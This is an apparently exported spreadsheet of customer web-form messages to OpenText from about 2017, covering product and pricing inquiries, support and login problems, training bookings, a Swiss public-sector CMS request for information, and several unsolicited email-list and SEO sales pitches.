    <t>Good morning, I am interested in the features of OpenText features. I would know if you sell some sdk or libraries so I can embed the features into my own application. Do you have any Italian or Spanish document? Can I have a trial version so I can test it?_x000D_
Regards</t>
  </si>
  <si>
    <t>We are exploring the ECM market to potentially replace an existing solution</t>
  </si>
  <si>
    <t>Looking for a pricing for Software maintenance,Silver Maintenance Renewal, Annual support agreement for Actuate BIRT StandardClient Server Edition -10 concurrent users._x000D_
Period of Performance_x000D_
9/30/17 - 9/29/18_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hello, hope you are doing great._x000D_
I am trying to search for an account manager in Mexico, could you help me?_x000D_
We have a client that suits perfect in the solution, could you help us?_x000D_
Best Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Sales please.  We currently have an on-premise installation of RightFax.   We are interested in a cloud replacement - do you have a cloud version of RightFax to offer?   </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I'm a third year business student in CIT. I'm looking for work experience in January 2018. I'm looking for experience in Human Resources, and maybe a little bit of Public Relations, but mainly HR. I am working in Soho Bar and Restaurant at the moment and I'm very reliable. Hope you get back to me._x000D_
Thank you kindly. </t>
  </si>
  <si>
    <t xml:space="preserve">i need information about this :_x000D_
Open Text eDocs DM  user Licence spanish version  500_x000D_
Open Text EDOCS DM Imaging    licence spanish version 25        </t>
  </si>
  <si>
    <t>I need to login to your site for a software update fro our Teleform application, but I am unable to reset my password Ticket #3286768, nor am I able to create a new login. Is there another way to get the software? I am coming from v10.91 so I would like to know if there is a clear upgrade path to 16.2 or do I need to break the updates up into smaller batches?</t>
  </si>
  <si>
    <t xml:space="preserve">Present we are using Oracle Webcenter Content as CMS and looking for an alternative CMS and would like to try Opentext WCM as an alternative. In regards to that, we need to install and explore Opentext WCM. </t>
  </si>
  <si>
    <t>Dear Sir/Madam We have been a customer of Gupta originally and then Centura since 1993. We still run applications developed on the platform 1.1.2 We currently want to upgrade our server to windows 64 bit. Could you please advise me on how to go about it as I find no sales department of Gupta on the net. A couple of years ago I spoke to a representative of Gupta in Paris named Christian Bourges but he is not available any longer.</t>
  </si>
  <si>
    <t>sir i am MCA final year student and i want to do my 6th sem project as internship in your company can you pleas ehelp me out hoe can i apply for internship_x000D_
_x000D_
Thanking you,</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you like to own the data in excel file for unlimited usages with quarterly updates:_x000D_
_x000D_
We provide the top Decision Makers Name, Email, Title, Phone and company details across US, UK, Canada, Australia, New Zealand and Singapore with 100% accuracy._x000D_
  _x000D_
•	CIOs list_x000D_
•	CTOs list_x000D_
•	Chief information security officers list	_x000D_
•	EVP/SVP/VP of IT executives list _x000D_
•	IT directors list_x000D_
•	IT Managers List_x000D_
•	IT security executives list_x000D_
•	IT Resellers/VARs list_x000D_
•	Database Administrators list_x000D_
•	Network Administrators list_x000D_
•	Business Intelligence Administrators list_x000D_
•	Fortune 1,000 companies IT decision makers list_x000D_
•	SME Business owners list_x000D_
•	SME IT decision makers list_x000D_
_x000D_
Technologies List:- Oracle Users, Amazon Users, VMware Users, OpenStack Users, Rackspace Users, IBM Users, Citrix Users, Microsoft Users, Salesforce Users, Google Users, Joyent Users, EMC Users, Comptel, DNP3, EMC, Entrust, Fortinet, Info Vista, IntelliTrack, IronPort, Juniper Networks, Kbox, Lan/Wan, Manage Engine, Marshal8e6, MacAfee, Mitel, Nuance, OPNET, PKWARE, Smtp, Solar Winds, Symantec, TCP/IP, TriGeo, USBTrace, VeriSign, VPN, WAN, Web Drive, Websense, Zenoss etc._x000D_
_x000D_
Kindly let me know if you are looking forward for any of the details mentioned above or any other application users.  We would be glad to provide you this information._x000D_
_x000D_
I’m looking forward to working with you._x000D_
 _x000D_
Regards,_x000D_
Peter Thomas</t>
  </si>
  <si>
    <t xml:space="preserve">We need to re-up our service contract for NJ RightFax. This is out Service ID for NJ - 32395-12116. It is currently running RightFax version 9.3. I have a note here from the technical team to ask "if you know the model of the Brook trout board that was purchased" that would be a great help._x000D_
_x000D_
Email sent to 'RQUARATE@OPENTEXT.COM'; 'DMUNLEY@OPENTEXT.COM' on 9/11/17._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Project in process of looking to evaluate the possibility of moving to a new ECM platform and wanted to see what OpenText has to offer.  </t>
  </si>
  <si>
    <t>Interested in Documentum, ECM.</t>
  </si>
  <si>
    <t xml:space="preserve">BASF is currently changing its infrastructure from Windows 8.1 to Windows 10. In this regard, the software [Exceed onDemand 7 -  Version 13.7.0.269], that we bought from you, has to be tested in terms of compatibility to Windows 10. With regard to the 6-month update cycle of Windows 10, we also require some additional information from you before we can start testing. Therefore, we kindly ask you to answer the following questions: _x000D_
** Will this version of the software be supported by you in terms of Windows 10? (Does this version work under Windows 10 and will it be supported by you in the framework of our support contract?) _x000D_
** If this version of the software does not work under Windows 10, is there a version of the software that does work under Windows 10 or will there be one, and if so, when? _x000D_
** Do you follow the Microsoft Evergreen approach for this software (aka Windows as a Service)? (Will you check the software as part of the Microsoft Insider program, in time before the final release of a new Windows 10 build is available?) You can find more information here https://docs.microsoft.com/en-us/windows/deployment/update/waas-quick-start. _x000D_
** Is there a direct contact for support in your company? (Please enter, if possible, the name, phone number and email address of your product’s technical support team) _x000D_
** Are there any further remarks which you would like to inform us in this context? _x000D_
Many thanks in advance for your cooperation. _x000D_
</t>
  </si>
  <si>
    <t>I am seeking a document management service that is HIPAA, PCI-DSS, and FIRSA compliant, able to store terabytes of information.</t>
  </si>
  <si>
    <t>Hi,_x000D_
Could you please let me know if there are any spaces available on the 3-0187 Installation and Configuration of CS16 course to be held in Reading on 24th &amp; 25th October 2017._x000D_
Thank you_x000D_
Ruth</t>
  </si>
  <si>
    <t>Hello, this is an inquiry on whether you offer cloud brokerage services/cloud aggregation services as we are looking for providers of the same.</t>
  </si>
  <si>
    <t>I need to get a quote on a solution, to send/receive healthcare faxes.   Security and encryption are paramount, also if there's a way to lock incoming faxes to either a group and/or specific individuals, that would also be preferable.</t>
  </si>
  <si>
    <t>Sorry wrong phone # a minute ago:  Support: I'm not sure about any #'s off hand, hopefully they are available on the server?  Our bureau is a consolidation of Financial Management Service (FMS) and Bureau of the Public Debt (BPD) and we are under the United States Treasury; hopefully you can find a current license # under our business name.  I've received a request for support this morning.  The customer has not been able to reach the site since it was moved to a new building. Upon checking the server I see the eDOCS WebAdmin Host service isn't starting.  I've never heard of this server or managed eDOCS before.  We are primarily a server provisioning shop.  Please take a few minutes to help me troubleshoot.  Thanks!  Bill</t>
  </si>
  <si>
    <t>Support: I'm not sure about any #'s off hand, hopefully they are available on the server?  Our bureau is a consolidation of Financial Management Service (FMS) and Bureau of the Public Debt (BPD) and we are under the United States Treasury; hopefully you can find a current license # under our business name.  I've received a request for support this morning.  The customer has not been able to reach the site since it was moved to a new building. Upon checking the server I see the eDOCS WebAdmin Host service isn't starting.  I've never heard of this server or managed eDOCS before.  We are primarily a server provisioning shop.  Please take a few minutes to help me troubleshoot.  Thanks!  Bill</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, wir interessieren uns für Ihr Produkt "Business Intelligence and Analytics". Leider vermisse ich auf Ihrer Informationsseite eine konkrete Auflistung von unterstützen Datenbanken. Ich frage dies, da wir im konkreten ein SAP BW nutzen und unser Analysetool mit diesem kompatibel sein soll. _x000D_
Bitte lassen Sie mir diesbezüglich weitere Informationen zukommen.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for documentum eroom software downloads. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Brava Desktop Licence Key required </t>
  </si>
  <si>
    <t>Hello, I work for a small data analytics company. We have been using the open source version of BIRT for almost 2 years, and are interested in the commercial version. We would like to get an idea of how much it will cost.</t>
  </si>
  <si>
    <t>i want to appear for Documentum certification . please assist me, how can i apply for this E10-110 EXAM.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm trying to access the OT Knowledge center, but can't seem to get in eventhough I was able to access it while I was attending both the OpenText ICC and VIM training courses in June 2017 at OpenText. Could you please check if my access can be updated to include the knowledge centre as I would need access to the latest ICC and VIM documentation? I can access the blogs okay and my login for the OpenText Learning Services site works, but not the Support._x000D_
_x000D_
Many thanks,_x000D_
Satu</t>
  </si>
  <si>
    <t>I'm not able to update my password from DellEMC to Opentext</t>
  </si>
  <si>
    <t>To request for the support of vignette application under open text we need access to my support.</t>
  </si>
  <si>
    <t>_x000D_
Hello,_x000D_
I have a problem with the part about my support. My company is open text partner I have registered but in the Your OpenText Resources section there is no "my support", how can I do it?_x000D_
_x000D_
Best regards</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm Laco head of team responsible for integrating CMS systems from Normex s.r.o. We have a customer that want integrate access to Documentum content management system into their program. For do that and test what will be possible for him we need setup server with Documentum. I found Documentum developer license 7.2 (https://community.emc.com/community/edn/documentum/blog/2015/11/21/documentum-72-developer-edition) but the link there is broken. I'm able download 7.1 dev license but it's quite old. And as I know the latest version is 7.3._x000D_
_x000D_
I want to ask, if there is some developer license of Documentum or some trial to able install server and test against it._x000D_
_x000D_
Thank you for response._x000D_
_x000D_
- Laco</t>
  </si>
  <si>
    <t>RFI - TeamSite_x000D_
_x000D_
Eine Schweizer Behörde hat sich im Rahmen ihrer Internetstrategie entschieden ein neues CMS zu beschaffen. Dabei sollen die zwei bestehenden Systeme durch eine neue Lösung ersetzt werden. Dieses Vorhaben soll als ein Projekt gemäss HERMES 5 abgewickelt werden._x000D_
_x000D_
Um die Planung (Termine, Kosten, Ressourcen) realistisch zu gestalten hat sich unser Kunde entschieden ein «Request for Information» (RFI) durchzuführen._x000D_
_x000D_
Wir bitten Sie, den in der Beilage mitgelieferten Fragebogen auszufüllen und spätestens bis am 20.09.2017 elektronisch als Excel-Datei an die unten angegebene E-Mail-Adresse zu retournieren. Sie müssen keine verbindlichen Angebote einreichen, sondern nur Richtpreise angeben. Die Angaben werden die Grundlage sein, um einen Projektantrag mit realistischem Budget und Zeitplan zu erarbeiten._x000D_
_x000D_
---_x000D_
_x000D_
Le RFI est disponible en allemand et français. Veuillez choisir une des deux langues pour répondre aux questions._x000D_
_x000D_
Dans le cadre de sa stratégie internet, une administration suisse a décidé de se doter d'un nouveau CMS. De ce fait, les 2 systèmes existants devront être remplacés par une nouvelle solution. Ce projet devra se dérouler en conformité avec HERMES 5._x000D_
_x000D_
Afin d'élaborer une planification (délais, coûts, ressources) réaliste, notre client a décidé d'effectuer un «Request for Information» (RFI)._x000D_
_x000D_
Nous vous prions de remplir le questionnaire ci-joint et de le renvoyer jusqu'au 20.09.2017 par courrier électronique à l'adresse e-mail ci-dessous (Format Excel). Vous ne devez pas soumettre d'offre, mais uniquement indiquer vos prix. Les indications serviront de base pour une demande de projet ultérieure avec un budget et un planning réaliste._x000D_
_x000D_
---_x000D_
_x000D_
Fragebogen / Questionnaire_x000D_
https://fileshare.elca.ch/RIT76453/download.php?id=1&amp;token=lTDGmfbQg6zMKZigPjdsZPPfOu05BxbM</t>
  </si>
  <si>
    <t>RFI - Web Site Manager_x000D_
_x000D_
Eine Schweizer Behörde hat sich im Rahmen ihrer Internetstrategie entschieden ein neues CMS zu beschaffen. Dabei sollen die zwei bestehenden Systeme durch eine neue Lösung ersetzt werden. Dieses Vorhaben soll als ein Projekt gemäss HERMES 5 abgewickelt werden._x000D_
_x000D_
Um die Planung (Termine, Kosten, Ressourcen) realistisch zu gestalten hat sich unser Kunde entschieden ein «Request for Information» (RFI) durchzuführen._x000D_
_x000D_
Wir bitten Sie, den in der Beilage mitgelieferten Fragebogen auszufüllen und spätestens bis am 20.09.2017 elektronisch als Excel-Datei an die unten angegebene E-Mail-Adresse zu retournieren. Sie müssen keine verbindlichen Angebote einreichen, sondern nur Richtpreise angeben. Die Angaben werden die Grundlage sein, um einen Projektantrag mit realistischem Budget und Zeitplan zu erarbeiten._x000D_
_x000D_
---_x000D_
_x000D_
Le RFI est disponible en allemand et français. Veuillez choisir une des deux langues pour répondre aux questions._x000D_
_x000D_
Dans le cadre de sa stratégie internet, une administration suisse a décidé de se doter d'un nouveau CMS. De ce fait, les 2 systèmes existants devront être remplacés par une nouvelle solution. Ce projet devra se dérouler en conformité avec HERMES 5._x000D_
_x000D_
Afin d'élaborer une planification (délais, coûts, ressources) réaliste, notre client a décidé d'effectuer un «Request for Information» (RFI)._x000D_
_x000D_
Nous vous prions de remplir le questionnaire ci-joint et de le renvoyer jusqu'au 20.09.2017 par courrier électronique à l'adresse e-mail ci-dessous (Format Excel). Vous ne devez pas soumettre d'offre, mais uniquement indiquer vos prix. Les indications serviront de base pour une demande de projet ultérieure avec un budget et un planning réaliste._x000D_
_x000D_
---_x000D_
_x000D_
Fragebogen / Questionnaire_x000D_
https://fileshare.elca.ch/RIT76453/download.php?id=1&amp;token=lTDGmfbQg6zMKZigPjdsZPPfOu05BxbM</t>
  </si>
  <si>
    <t>RFI - Web Experience Manager_x000D_
_x000D_
Eine Schweizer Behörde hat sich im Rahmen ihrer Internetstrategie entschieden ein neues CMS zu beschaffen. Dabei sollen die zwei bestehenden Systeme durch eine neue Lösung ersetzt werden. Dieses Vorhaben soll als ein Projekt gemäss HERMES 5 abgewickelt werden._x000D_
_x000D_
Um die Planung (Termine, Kosten, Ressourcen) realistisch zu gestalten hat sich unser Kunde entschieden ein «Request for Information» (RFI) durchzuführen._x000D_
_x000D_
Wir bitten Sie, den in der Beilage mitgelieferten Fragebogen auszufüllen und spätestens bis am 20.09.2017 elektronisch als Excel-Datei an die unten angegebene E-Mail-Adresse zu retournieren. Sie müssen keine verbindlichen Angebote einreichen, sondern nur Richtpreise angeben. Die Angaben werden die Grundlage sein, um einen Projektantrag mit realistischem Budget und Zeitplan zu erarbeiten._x000D_
_x000D_
---_x000D_
_x000D_
Le RFI est disponible en allemand et français. Veuillez choisir une des deux langues pour répondre aux questions._x000D_
_x000D_
Dans le cadre de sa stratégie internet, une administration suisse a décidé de se doter d'un nouveau CMS. De ce fait, les 2 systèmes existants devront être remplacés par une nouvelle solution. Ce projet devra se dérouler en conformité avec HERMES 5._x000D_
_x000D_
Afin d'élaborer une planification (délais, coûts, ressources) réaliste, notre client a décidé d'effectuer un «Request for Information» (RFI)._x000D_
_x000D_
Nous vous prions de remplir le questionnaire ci-joint et de le renvoyer jusqu'au 20.09.2017 par courrier électronique à l'adresse e-mail ci-dessous (Format Excel). Vous ne devez pas soumettre d'offre, mais uniquement indiquer vos prix. Les indications serviront de base pour une demande de projet ultérieure avec un budget et un planning réaliste._x000D_
_x000D_
---_x000D_
_x000D_
Fragebogen / Questionnaire_x000D_
https://fileshare.elca.ch/RIT76453/download.php?id=1&amp;token=lTDGmfbQg6zMKZigPjdsZPPfOu05BxbM</t>
  </si>
  <si>
    <t>Eine Schweizer Behörde hat sich im Rahmen ihrer Internetstrategie entschieden ein neues CMS zu beschaffen. Dabei sollen die zwei bestehenden Systeme durch eine neue Lösung ersetzt werden. Dieses Vorhaben soll als ein Projekt gemäss HERMES 5 abgewickelt werden._x000D_
_x000D_
Um die Planung (Termine, Kosten, Ressourcen) realistisch zu gestalten hat sich unser Kunde entschieden ein «Request for Information» (RFI) durchzuführen._x000D_
_x000D_
Wir bitten Sie, den in der Beilage mitgelieferten Fragebogen auszufüllen und spätestens bis am 20.09.2017 elektronisch als Excel-Datei an die unten angegebene E-Mail-Adresse zu retournieren. Sie müssen keine verbindlichen Angebote einreichen, sondern nur Richtpreise angeben. Die Angaben werden die Grundlage sein, um einen Projektantrag mit realistischem Budget und Zeitplan zu erarbeiten._x000D_
_x000D_
---_x000D_
_x000D_
Le RFI est disponible en allemand et français. Veuillez choisir une des deux langues pour répondre aux questions._x000D_
_x000D_
Dans le cadre de sa stratégie internet, une administration suisse a décidé de se doter d'un nouveau CMS. De ce fait, les 2 systèmes existants devront être remplacés par une nouvelle solution. Ce projet devra se dérouler en conformité avec HERMES 5._x000D_
_x000D_
Afin d'élaborer une planification (délais, coûts, ressources) réaliste, notre client a décidé d'effectuer un «Request for Information» (RFI)._x000D_
_x000D_
Nous vous prions de remplir le questionnaire ci-joint et de le renvoyer jusqu'au 20.09.2017 par courrier électronique à l'adresse e-mail ci-dessous (Format Excel). Vous ne devez pas soumettre d'offre, mais uniquement indiquer vos prix. Les indications serviront de base pour une demande de projet ultérieure avec un budget et un planning réaliste._x000D_
_x000D_
---_x000D_
_x000D_
Fragebogen / Questionnaire_x000D_
https://fileshare.elca.ch/RIT76453/download.php?id=1&amp;token=lTDGmfbQg6zMKZigPjdsZPPfOu05BxbM</t>
  </si>
  <si>
    <t>Brava Free DWG Viewer Message while open a dwg-file:_x000D_
Invalid License_x000D_
Unable to load files_x000D_
_x000D_
An update ist required for Brava! FreeDWG Viewer._x000D_
Pleas contact your upplier for an update.</t>
  </si>
  <si>
    <t xml:space="preserve">Good opportunity has come up and I need an open text partner that operates in Slovkia._x000D_
_x000D_
Please contact me ASAP._x000D_
_x000D_
Alicia </t>
  </si>
  <si>
    <t xml:space="preserve">To manage our records, we have started using OpenText, and we would like to attempt a training session </t>
  </si>
  <si>
    <t>Does CC CRM work with Odoo? Are there successful reference projects for that? If there is software to be installed on users' devices, is Linux supported as an OS?</t>
  </si>
  <si>
    <t>My account is on EMC - MyService360 where I create and Update the service request. Do I need to create an account here to do the same? If yes then how? _x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">please give me the opportunity to work in your company. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are looking for a OCR solution for our application, which should be able to extract information from Receipts, statement and other uploaded documents (these documents may not be in standard format, in the sense the receipts can be from different vendors) and enter into our systems._x000D_
_x000D_
All of this should be done with no human intervention, apart from uploading documents in our application._x000D_
_x000D_
it will be good if the software can tell of the uploaded image is readable or need a better image._x000D_
_x000D_
We are looking to get an evaluation copy, so that we can do a proof of concept before we can decide on the purchasing. _x000D_
_x000D_
Thanks,_x000D_
Sivagurunathan</t>
  </si>
  <si>
    <t>Interested in using a demo version of ProVision to see if it meets my process mapping needs.</t>
  </si>
  <si>
    <t>I would like to create a new Fax2Mail account and then move 3 fax numbers from another account to this new account so we can separate billing on these 3 fax lines.</t>
  </si>
  <si>
    <t>Question about fully hosted Rightfax</t>
  </si>
  <si>
    <t>Asking you to please put a block on our fax number 503-392-4533 and stop calling us.  Your phone number 800-396-9402 called us 21 times from 2:06 pm  09/10 - 2:20pm  09/11. If you don't I am going to make a formal complaint to the FCC.</t>
  </si>
  <si>
    <t>Hello, we are wondering if we can get trial licenses for the following products: SAP Document Access by OpenText, OCR option for SAP Invoice Management, SAP Invoice Management by OpenText for S4HANA?</t>
  </si>
  <si>
    <t>Purchased Brava Desktop CXL but found it will not open STP files.  Can this STP format be added</t>
  </si>
  <si>
    <t>We are looking for a new system that can handle Document Control Management, Material Requisition generation and various reporting</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
we are requesting a quote for the following application:_x000D_
_x000D_
Brava! Desktop 7.4 CXL that supports DGN, DWG, DXF, DWF, TIFF, PDF, EPS, JPEG, My SID formats. Includes Compare, Publish and Annotate._x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Can you please confirm that a class will for sure take place before I make plans?_x000D_
10/17/2017 3-2202 OpenText Capture Center (OCC) English Hoofddorp, NL_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>We currently have support through the EMC website for our ApplicationXtender platform but have been told by our vendor that we now will need an OpenText access. I need to know what information is needed (and where I can find it) to supply for the account._x000D_
_x000D_
I can also be reached at 435-363-0078_x000D_
The business is GE Healthcare (HyClone Laboratories) and our Vendor is Dataimage.</t>
  </si>
  <si>
    <t>Purchased Brava Desktop CXL and received email to download but cannot go to accounts to select activation</t>
  </si>
  <si>
    <t>Need our production license for xDB - OSF purchase Infoarchive from EMC in 12/2016 but we are currently building the environment out. Help would be appreciated. Thank you. Tim Leitner</t>
  </si>
  <si>
    <t>I can not access all my tickets from emc.documentum.com</t>
  </si>
  <si>
    <t>Whenever I tried to open a ticket by clicking "My Support" link, the page ask me to log in again.  Please help.  Thanks.</t>
  </si>
  <si>
    <t>Can you please get me my network # for gxs? _x000D_
Thanks</t>
  </si>
  <si>
    <t>I would like to download ProVision version 9.X. Please help me with the link to download the software._x000D_
_x000D_
Thanks,_x000D_
Vignesh</t>
  </si>
  <si>
    <t>We got the license from SHI, but need the link to download the Exceed 15 installable.</t>
  </si>
  <si>
    <t>Problem accessing My Support Page</t>
  </si>
  <si>
    <t>I was having access to our NTT DATA sites and also customer site for which I am working_x000D_
NTT DATA and ThermoFisher</t>
  </si>
  <si>
    <t>after download and install I cannot open any files.  Re-directs to a page \vercheck which does not exist._x000D_
Is a disk copy of this software available and how much?_x000D_
Would like to try newest version as I have used this software at a previous employer and was quite pleased, especially when trying to open antiquated customer documents where other .pdf type viewers failed._x000D_
_x000D_
Thank you,_x000D_
Brad</t>
  </si>
  <si>
    <t>Need access to MySupport</t>
  </si>
  <si>
    <t>Hi,_x000D_
My company is looking for a solution that will enable our current static and transaction PDF documents to be 508 compliant (ex. Explanation of Benefits, etc.).  I'd like to have a solution that will generate the documents on the fly for our members via our portal.  I think your product could be viable option.  Please contact me with more details._x000D_
_x000D_
Thanks,_x000D_
Scott Morin</t>
  </si>
  <si>
    <t>Mon client avait acquis HP Extream en 2012 et étudie maintenant une nouvelle architecture cible. J'aimerais qu'un expert OpenText me contacte à ce sujet afin de vérifier la couverture fonctionnelle par rapport aux besoins exprimés.</t>
  </si>
  <si>
    <t xml:space="preserve">just got a knowledge </t>
  </si>
  <si>
    <t xml:space="preserve">Cordis software required </t>
  </si>
  <si>
    <t>Would like to speak to sales person about OpenText Media Manager and OpenText Media Bin.  Please can someone call back asap.</t>
  </si>
  <si>
    <t>My credit card has been charged with two charges from your company please send me the invoices for Auth# 151901, 152028. Both on June 5 for the amount 1343.25. Both Auth# are charged at same cost. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Having problems registering on your site. I requested a pw reset but not working._x000D_
_x000D_
Please assist.._x000D_
_x000D_
Thanks </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database top five Collaboration Software Users mention below?_x000D_
_x000D_
•	Atlassian HipChat Software Users_x000D_
•	Podio Software Users_x000D_
•	Slack Software Users_x000D_
•	Igloo Software Users_x000D_
•	Workfront Software Users_x000D_
_x000D_
This list Contains Company name , Web address ,Contact name, Phone number, Email address, Title, physical address, City, State ,Zip Code, Country, Phone number, Fax Number, Employee size and last verified date._x000D_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</si>
  <si>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New Castle County use ApplicationXtender and we learned that OpenText owns it now. I need assistance and would like to create a support ticket. Earlier my team did it in EMC website but we don't see the support ticket option there. So how can we get support from OpenText?_x000D_
Please help us._x000D_
Thanks_x000D_
Sudha</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently using xPression to produce our documents and want to look at other suites of applications that can do similar (hopefully superior) things. Not sure what may be available but read about Livelink and would like to find out more. </t>
  </si>
  <si>
    <t>I was hoping an engineer could please advise how we can change a clock within the ICCM portal that is an hour ahead. I'm sure there is probably a table with the admin forms section but we are struggling to find exactly where._x000D_
_x000D_
The time shows as it should with the tickets themselves but when looking at another view, it is wrong. I have a screenshot I can send on to someone if you can please let me know where to send it._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>I want to active  this service</t>
  </si>
  <si>
    <t>I would like access to Unify DB documentation so I may fully support it.</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
Get your website on Google’s Front Page search:_x000D_
_x000D_
We would like to have a discussion with you regarding the web promotion strategy for your website. We wish to work out a proposal to strengthen the online presence of your website, via, a strategically planned web promotion campaign. In today’s online era, you should be focusing on the new revolutionary ways of generating traffic._x000D_
_x000D_
We were curious to know if you were aware that are a few issues bugging your website. Sorting out these will help you get the best returns out of your website._x000D_
_x000D_
Your website seems to be attracting traffic, but this traffic is almost stagnant and limited, which affects potential sales as you move forward._x000D_
_x000D_
Your website doesn't feature in Google's first search page for some of the major keywords in your niche, which affects visibility._x000D_
_x000D_
Your website has been diagnosed with coding issues, which affects ranking._x000D_
_x000D_
Your back links profile is not efficient enough to help your search engine visibility._x000D_
_x000D_
Your website is currently not being properly promoted online, which is affecting your marketing strategy and goals_x000D_
_x000D_
Your presence in social media platform (Facebook, Twitter, etc.) is minimal. This is depriving you of a huge market of prospective referral clients. _x000D_
_x000D_
We excel in running promotional online marketing campaign for websites. We have a host of ethical services and techniques, which you can utilize to improve your website's performance. We could send you more details regarding your present website status; we would be glad to share “PRE SEO REPORT” or “WEBSITE ANALYSIS REPORT for FREE”._x000D_
_x000D_
Kindly revert back if you are interested, then we can send you more detail about package which will improve your sales &amp; website ranking too._x000D_
_x000D_
Hope to get early response._x000D_
_x000D_
Best Regards, _x000D_
Alisha Wilson| Senior Sales Advisor_x000D_
_x000D_
__________________________________________________________________________x000D_
_x000D_
PS1: Please answer to our email with “Interested” or “Not Intereste</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
we have some open text clients running, they are outdated but still in use. Now we try to update our antivirus solution and we get some trouble. McAfee told us, that it is regarding a unsigned dll that is comming from the Open Text Socks Client 14x64, we are running it in Version 14.0.0._x000D_
Now my question, can you provide us a test Version from an actual Socks Client, that we can verify, that a upate should solve our issue?_x000D_
Thanks_x000D_
Olaf Skarabis_x000D_
-Benteler-</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know which products of Open Text can use "OpenText Personalized Help" e.g. can it be use in eDocs or only in Content Suite and since OT has purchased Documentum does documentum support it as wel? </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
_x000D_
Tony @ Crown Paints called this morning, he is concerned about receiving a letter from customer support saying we had changed some of his portal users to read only, he didn’t recognise some of the names on the list. Please can someone give him a call to discuss... _x000D_
_x000D_
_x000D_
Tel: 01254870083_x000D_
</t>
  </si>
  <si>
    <t>Can we have a online session in China? And what's the price and what's the currency?</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
We need to see a demo. Please advise the next step. Thank you._x000D_
_x000D_
Regards,_x000D_
A.Z</t>
  </si>
  <si>
    <t xml:space="preserve">Hi -- I sent e-mail below but received no answer - please suggest appropriate contact for this query - Thanks Don_x000D_
From: Don Brosnan _x000D_
Sent: 07 September 2017 16:54_x000D_
To: 'salesledger@easylink.com' &lt;salesledger@easylink.com&gt;_x000D_
Cc: Adrian Williams &lt;awilliams@alps.ie&gt;_x000D_
Subject: Easylink Service for Alps Electric Ireland Limited_x000D_
_x000D_
Hi _x000D_
_x000D_
Our Billed Account is 532-9355 and last invoice was 07448051709_x000D_
Currently we think we are not using Easylink service for receiving or sending data._x000D_
If possible please verify this and please let us know _x000D_
1.	Cancellation notice and procedure_x000D_
2.	Reinstatement procedure and fee (in case we make mistake or Customer wants us to start using it again)_x000D_
_x000D_
Thanks_x000D_
Don_x000D_
</t>
  </si>
  <si>
    <t>Dear OpenText Support Team,_x000D_
I would like to know if my company Tengizchevroil has an active OpenText Customer Support maintenance contract?_x000D_
How can I contact you to discuss some technical problems about deployment of Content Bridge?_x000D_
Thanks in advance!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,   Are you looking for  Ektron  customers for your solution? Get  4,150  ready  Ektron  customer  email list  from  UK. _x000D_
_x000D_
Get a test file to evaluate the customers email list. _x000D_
_x000D_
kindly respond back for test file and additional information._x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Susan smith_x000D_
Susan.smith@texttechzone.com_x000D_
_x000D_
_x000D_
12 Years of Business expertise._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Please schedule a demo about ECM &amp; BPM, and is possible to provide a trial version for us?</t>
  </si>
  <si>
    <t>Magellan autologous platelet separator</t>
  </si>
  <si>
    <t>Trainning required in October._x000D_
Pls advise country for this course _x000D_
Need English version</t>
  </si>
  <si>
    <t>Test : Message deposé Dimanche 10/09 à 8h35</t>
  </si>
  <si>
    <t>Confirming we have a support contract. If so, I am having trouble logging on. My confirmation email says I have support access, but when I attempt to access, I am told that I do not.</t>
  </si>
  <si>
    <t>Hi Editor,_x000D_
I would like to contribute a blog to your website. Please connect me to the right person_x000D_
Regards,_x000D_
Sonal_x000D_
Content Writer</t>
  </si>
  <si>
    <t>Hi Editor,_x000D_
_x000D_
I would like to contribute a blog to your website. please connect me to the right person._x000D_
Regards,_x000D_
Sonal_x000D_
Content writer</t>
  </si>
  <si>
    <t>Hi Marketing team, _x000D_
_x000D_
I trust this message finds you doing well. We are a global leader among database vendors, working with many fortune companies in providing email lists to grow their sales and marketing activities. We compile and maintain a database of over 35 Million B2B and 380 Million B2C records. _x000D_
_x000D_
Some of our clients include: Cisco, VMware, Oracle, SAP, Lawson, Bank of America, General Motors, AT&amp;T, Applied Biosystems etc._x000D_
_x000D_
I see that you are one of the exhibitors at Dreamforce Cloud Expo 2017. We recently sold Salesforce users list to some exhibitors of Dreamforce Expo. Would you be interested in acquiring our recently updated email lists of SALESFORCE users (123,900 records across the globe) for your marketing campaigns? _x000D_
_x000D_
We can also provide you with the database of Managed Service Providers (MSP), Value Added Resellers (VAR), Managed Security Service Providers (MSSP), Cloud Service Providers (CSP), and System Integrators (SI). _x000D_
_x000D_
OUR OTHER SERVICES:_x000D_
_x000D_
AMPLIZ: We are a global leader in account-based marketing software. Ampliz is now bigger than Zoominfo, Demandbase, DiscoverOrg and Acxiom. Using the latest in technology we have come up with the perfect data management software application, that will help you perform complicated data-related functions in the easiest possible way. We have different subscription plans to cater to all kinds of businesses of all sizes and budgets._x000D_
_x000D_
